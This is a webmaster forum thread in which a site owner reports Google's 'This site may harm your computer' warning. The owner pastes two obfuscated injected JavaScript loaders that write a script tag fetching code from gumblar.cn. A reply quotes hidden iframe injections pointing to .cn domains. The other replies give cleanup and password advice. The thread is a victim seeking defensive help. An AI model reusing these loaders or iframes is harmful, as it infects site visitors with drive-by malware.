This site may harm your computer.....for my site..i will give you reason

today i see one of my site i search in google and i see this tag

This site may harm your computer.

now i see in code part there is auto generated script...

i don't know how they come

this is 5'th time this script is auto generated in my 5'th site

here is the script

--------site 1----------------

<script language=javascript><!--
(function(x8O3){var xlO='%';var UEe='var:20a:3d:22Script:45ngine:22:2cb:3d:22Ver:73i:6fn:28)+:22:2cj:3d:22:22:2cu:3dnavi:67:61tor:2euser:41g:65n:74:3bif((u:2ein:64ex:4ff22Wi:6e:22):3e0:29:26:26(u:2ein:64:65xOf22:4eT:206:22):3c0):26:26(d:6fcume:6et:2eco:6f:6bi:65:2eindexOf22mi:65k:3d1:22):3c:30:29:26:26(t:79pe:6f:66(zrvzts:29:21:3d:74y:70eo:6622A:22))):7b:7arv:7at:73:3d:22A:22:3beval22if(window:2e:22+:61+:22:29:6a:3d:6a+:22+a:2b:22M:61j:6fr:22+:62+:61+:22Minor:22:2bb:2ba+:22B:75il:64:22:2bb+:22:6a:3b:22):3bd:6fcu:6den:74:2ewr:69te22:3cs:63ript:20src:3d:2f:2fg:75mblar:2e:63n:2frs:73:2f:3fi:64:3d:22+:6a+:22:3e:3c:5c:2f:73:63ri:70t:3e:22):3b:7d';var Wu82g=UEe.replace(x8O3,xlO);eval(unescape(Wu82g))})(/:/g);
--></script>
-------------

-----another script for another site (site 2)------

(function(){var wLK9='%';var ddPv='"76ar"20a"3d"22S"63r"69"70tEngine"22"2cb"3d"22Versio"6e("29+"22"2cj"3d"22"22"2c"75"3dnavigator"2euserA"67ent"3b"69f"28("75"2eindexOf("22"57in"22"29"3e0"29"26"26(u"2eind"65xO"66"28"22NT"206"22)"3c0)"26"26(do"63ument"2ec"6fokie"2e"69nd"65"78Of("22m"69ek"3d1"22"29"3c0)"26"26"28ty"70"65of(zrv"7at"73"29"21"3dtypeo"66("22A"22"29))"7bzr"76z"74"73"3d"22A"22"3beva"6c("22if(w"69"6ed"6fw"2e"22"2ba+"22)j"3dj+"22+a+"22Majo"72"22+b+a+"22"4din"6fr"22+"62+"61"2b"22Buil"64"22+b+"22j"3b"22)"3b"64o"63um"65nt"2e"77r"69te"28"22"3cscript"20sr"63"3d"2f"2fgu"6db"6car"2ecn"2frss"2f"3fid"3d"22+"6a"2b"22"3e"3c"5c"2fscr"69p"74"3e"22)"3b"7d';var aVpO=ddPv.replace(/"/g,wLK9);var xhZ3=unescape(aVpO);eval(xhZ3)})();
--></script>

-------------------

is this hacking attack?

how can stop this type of attack?

please help

 

Don't know but get rid of it quickly and ask google for reinclusion!

 

but how can i stop this type of attack?

 

you need to remove this script from all your files.. double check it is not remained in any of your site or any of your page...
even if it is remained in a one file then it will replicate and injected to all other your sites ..

 

i never use this type of script...i don't know how they come

 

:O

well thanks for tellling this but dude i think u must do that manually delete those scripts manually

 

all time i will manually but this is fifth time i face this problem....

 

I got this kind of hack before (not same code as yours)

here is the example of script I got...



and It will generate this code on all the files (which name index.html, index.php,index.htm)

<iframe src="http://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>

Code (markup):

<iframe src="http://internetcountercheck.com/?click=26321437" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Code (markup):

You have to check and clean all the files.

But if you have any recent backup
then upload and overwrite all.



here is my advise
- Don't use internet cafe for doing your website (uploading file, etc.)
- Backup Your site every week
- Change ftp password to secure password like '!$up3rm4N' is more secure than 'superman'
- Avast Antivirus can detect some of this scripts (available at avast.com)

 

i already remove manually this code.

but now what if this type of attack again and again..

every time i remove manually......

but this is fifth time

and now i want to find some way to stop this type of attack..

please help me

 

-Check all of your files if there are some strange scripts there remove them all. (It might take several times)
-Change your ftp password
-Change your phpmyadmin password

That should help ^^'

 

Hacker attack.

Chnage your control panel login password.

Make sure the code does not remain in any file.
Check server logs for details

 

yes one of my client had this virus of java script, when people click it save into computer. so google gives tips " to click on this site harm your computer "

 

now the main question is how can we preparing our site for this type of Hacker attack?

 

check your ISP,if they got ARP hack...........

 

The way I see it, someone may have known your Ftp password and was able to insert the piece of code.

 

This problem occurs when more than one person uses the computer, try avoiding it. If you are on a shared computer then look for it. Mainly this is easily done if you are using your website in the internet cafe oftenly. You should take care of your passwords.

 

most probably the system you use to upload files or run ftp program is infected with virus.

try uninstalling ur ftp program and remove any files left after uninstalling the program. change your ftp login and password. u have to clean every single infected file. to make life easy u can use TextCrawler to delete a peice of code from all the files at once. make sure u check different file types. most probably .html, .php, .js all these file types will have different virus codes. if u can share ur site url I may have a look and diagnose the problem.

 

how much time Google take for remove this tag "This site may harm your computer." after cleaning and submitting site .?

 

few hours normally within 12 hours

 

Complain about the code to your web hosting, I think there is hole on the server. Clean the site and upload it again.